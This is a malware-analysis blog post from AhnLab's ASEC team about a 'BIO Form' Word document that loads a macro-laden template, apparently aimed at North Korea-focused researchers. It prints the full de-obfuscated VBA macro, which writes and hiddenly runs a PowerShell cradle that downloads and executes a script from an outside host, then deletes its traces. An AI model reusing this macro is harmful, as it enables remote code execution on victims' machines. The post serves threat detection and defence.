Word Document Titled ‘BIO Form’ Being Distributed

Since last month, the ASEC analysis team has been continuously uploading posts about APT attacks using word documents. Recently, it found that the malware of the same type is being constantly distributed in the name of ‘BIO form.’ By looking at the distribution history of previous word documents, we can assume that this file is also targeting professors or research center directors related to North Korea while disguising itself as a biography form.

The recently discovered file that is being distributed also runs the dotm file that includes a malicious macro through the external link inside the word file. The following shows the external link included in the ‘BIO Form (Mr. XX).docx‘ file that was found to be distributed on August 2nd.

Figure 1. External link included in ‘BIO Form (Mr. XX).docx’

The downloaded BIO.dotm file includes a malicious macro. The macro code is obfuscated in the same method as the previous one. Unobfuscating the macro reveals the code as shown below.

Private Sub Document_Open()
Set djfeihfidkasljf = CreateObject("Shell.Application")
dfgdfjiejfjdshaj = "powershell.exe"
dfjsdjailfksf = "C:\windows\temp\Ahnlab.log"

skdjfksjkfjkdsfj = "$fjeils={(New-Object Net.WebClient).Dring('hxxp://zenma.getenjoyment.net/ja/ng.txt')};[string]$aiwdf=$fjeils;$ndask=$aiwdf.insert(28,'ownloadst');$bmcns=iex $ndask;iex $bmcns"

Open Trim(dfjsdjailfksf) For Output As #2
       Print #2, skdjfksjkfjkdsfj
    Close #2
dfisafkdjaflkjs = "$a='C:\windows\temp\ahnlab.log';$d=[IO.File]::ReadAllText($a);$e=iex $d;iex $e"

djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, dfisafkdjaflkjs, "", "open", 0
Dim SngSec As Single
    SngSec = Timer + 5
Do While Timer < SngSec
Kill (dfjsdjailfksf)
End Sub

Previously the macro performed a powershell command that attempts to directly download files from a certain URL. But this macro code had its method changed to create a download command in the ‘Ahnlab.log‘ file and run the created file.

Figure 2. Created Ahnlab.log file

The powershell command performed upon running the word file was changed as shown below.

Figure 3. Change in process tree upon running macro (AhnLab RAPIT)

The script that is in hxxp://zenma.getenjoyment.net/ja/ng.txt, which is ultimately executed performs the same feature as in previous cases.

Figure 4. Malicious script downloaded through powershell

As word documents that exploit external links and target certain users are still being distributed, users need to take extra caution.

AhnLab’s anti-malware product, V3, detects and blocks the types of files above using the aliases below.

[File Detection]

  • Downloader/XML.External
  • Downloader/DOC.Agent

[Related Post]

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Categories:Malware Information

Tagged as:

5 1 vote
Article Rating
Notify of

Inline Feedbacks
View all comments